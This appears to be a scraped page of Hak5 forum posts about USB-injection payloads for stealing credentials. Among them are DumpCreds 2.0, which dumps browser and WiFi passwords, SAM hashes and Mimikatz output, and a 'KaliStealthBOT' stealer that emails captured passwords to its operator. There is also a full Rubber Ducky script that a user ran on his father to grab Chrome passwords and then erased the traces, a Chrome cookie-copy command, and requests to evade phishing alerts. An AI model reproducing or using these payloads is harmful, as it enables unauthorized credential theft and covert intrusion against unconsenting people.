Search the Community

DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1

OS . WINDOWS 10 Professional - TESTED ( 8 - 7 windows - maybe) NAME_SCRIPT . KaliStealthBOT Service . $FREE ************************************************************************************ I Can Grab a PWD Web Firefox - Chrome - IE and Send Via Email. ************************************************************************************* HOW TO SET: Register account SMTP free here https://app.smtp2go.com and *PUT-LOGIN-HERE* & *PUT-YOUR-PWD* then *INSERT-YOUR@EMAIL-HERE* where you want receive the goods :) __________________________________________________________ 1.$url = 'https://1fichier.com/?xxxxxxxxx- Pass Stealer Software 2.$url = 'https://1fichier.com/?xxxxxxxxx - sendEmail Client *** You can change this with every similar software __________________________________________________________ See u.. https://www.ducktoolkit.com/viewscript/59967fc4ac04af7d6d57dc54/ I Appreciated all comment or rebuild. Thanks

Violation of CoC

So, when using macinfograbber it doesn't work unless I comment out the following lines: QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db Upon further inspection, I located my Cookies file on all of my Macs. It's here: /Library/Application\\ Support/Google/Chrome/Profile\\ 3/Cookies Is there anything I can do to change this? Meaning, are all of my computers unique in some way, or is this normal Chrome file placement, and can code be added to look for all profile folders and the cookie files therein? Thanks in advance! -Cheers!

hey, I just got my first rubber ducky today and i already ran my first payload on my dad ( he was like *.*) . so before executing, i downloaded WebBrowserPassView version 1.45 where the program would run and create a .txt file where all the chrome passwords are saved in and put it on a usb that i bought. this usb is very small(maybe the the size of my nail) and i plugged it minutes before my ducky, after plugging the usb i saw that the usb was recognized as drive F: so at this moment i wrote my script REM open cmd DELAY 1000 GUI R DELAY 200 STRING cmd DELAY 150 ENTER REM resize cmd DELAY 200 STRING MODE CON: COLS=15 LINES=1 DELAY 10 ENTER REM access the F: drive STRING F: ENTER REM launch the bat file DELAY 200 STRING LAUNCH.BAT ENTER DELAY 300 REM clear my tracks STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue DELAY 100 ENTER DELAY 500 REM exit cmd STRING EXIT DELAY 10 ENTER After that i remove the ducky and wait for the appropriate time to remove the usb and plug it in another computer and get the password.txt So my question is, is there a way to access those files without using another usb(i heard about the twin ducky, i might try it, but im open for other suggesions) thanks!!

Hey guys I'm new to the USB rubber ducky and have some questions. I want to try and make some payloads for chromebooks due to their wide use everywhere. Will that work? The password stealing payload was cool but it doesn't work due to the chrome update. I have a work around but it takes a little longer, involves going to chrome web store, installing "show password" extension, showing password, copying it, etc. Is that even possible to do with the USB rubber ducky? Where do I start? Thanks

Violation of CoC

I had a question that I wanted to see if anyone has encountered or heard of. At my work 2 devices had all search results in Google Chrome redirect. On the desktop all image search results would come up with large people. On a Chromebook any search result came back with porn. Unfortunately someone wiped out the desktop so I was unable to get my hands on it to look it over. The systems are generally locked down (the desktop by GPO) and the Chromebook by Google admin. Anyone run into this before? Thanks

Basically if you append /%%30%30 to the end of any url you manually enter it will crash chrome (desktop) and a mouse over of a link containing it can crash chrome, or just the page you were on with the link. On mobile Chrome only mouse over works at least from testing it on my tablet and phone.

Hi guys, im having troubles with the credential harvester. Im testing it with facebook on my local network, and firefox/Iceweasel doesn't detect anything, but chrome detects it after 5'. I've read that this is a built in function, not a blacklisted url. Does anybody know how to bypass this phishing alert? I've tried obfuscating the html code and that didin't work out. Thanks!

Hi there. Long time viewer of Hak5. (Tried successfully hacking the ZipIt Z2 to run AirCrack) I've recently invested in a Lenovo Thinkpad W510 [intel Quad-core i7 720QM, 4GB RAM, Win7] for my small business. I'm mainly going to be doing online surfing, video conferencing, and word processing. Though my main focus for this post is the online surfing and perhaps the conferencing too. I'm not computer literate. I've dabble lightly in networking, (aka I'm the one who fixes the 'internet' at home) so I know the surface of the malicious threats that can befall someone surfing the net. But my question is this: What sort of extensions for Chrome and perhaps simple programs on Win7 exist out there that can offer me a smidgen of an illusion of a more secure laptop and online experience, from online and wifi threats? You know, so I don't have to reformat every few months, give up sensitive client info, or sacrifice sanity while using my browser. It doesn't need to be a free option, I don't mind paying a developer for a program or system of security worth my time and effort.

Let me, properly, start my own thread (instead of hijacking). Here's my setup: Wifi PineApple setup with PineApple juice 6800... wlan1 connected as client to public wifi and wlan0 rebroadcasting as AP... trying to MITM with Karma and SSL Strip running. Here's my issue: it doesn't capture hardly ANYTHING! I do some some entries enter SSL Strip's log (it's working)... it just will NOT strip the SSL from Facebook, Gmail, all sorts of useful sites! The first video on uni.wifipineapple.com is VERY misleading - if not a downright scam. Correct me if I'm wrong... but stripping SSL from Facebook is not possible on a current 'good' browser (especially an updated version of one that has accessed Facebook in the past) - right? I see some benefits of the PA... it's still very neat... it would just be very NICE if the product was properly advertised. Maybe remove that useless video? It's kind of like... showing an advertisement for Sea World with trainers swimming with the killer whales..... when that's no longer allowed (but 1/2 the reason you went there, was because of that exact attraction). Anyways.... can I do anything at all with mobile devices that are connected to Karma's SSID (they all use apps... so I assume no)... I know nothing about this side of things (can anyone shed some light or point me in the right direction)? Seems a majority of my plans have been destroyed due to the way things REALLY are (not in a controlled advertisement environment). (Hopefully this post isn't deleted... as these are legitimate concerns that I wish I'd known about before purchasing.)

Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWSOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THEIF!!! Payload: Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead. Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB READ ME!!.txt contents: SCRIPT/PAYLOAD BY LAVANOID VOLCANIC THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. FILE LOCATIONS: SP.bat -- Data\SP.bat inject.txt -- Scripts\Projects\Steal_Data\inject.txt Compiler.bat -- Scripts\Compiler.bat COMPILER.bat description: The compiler batch file basically takes away the hassle of entering all those annoying time draining commands. If the Compiler.bat file is stored on the Duck, the compiler will ask if you want to install it on the Duck. WHAT I HOPE: I hope that my project will be featured in one of the Hak5 videos since I do like some attention. THIS WORLD IS LONELY YOU KNOW!! Thank you for choosing to spend a bit of your time by poking your nose into my work.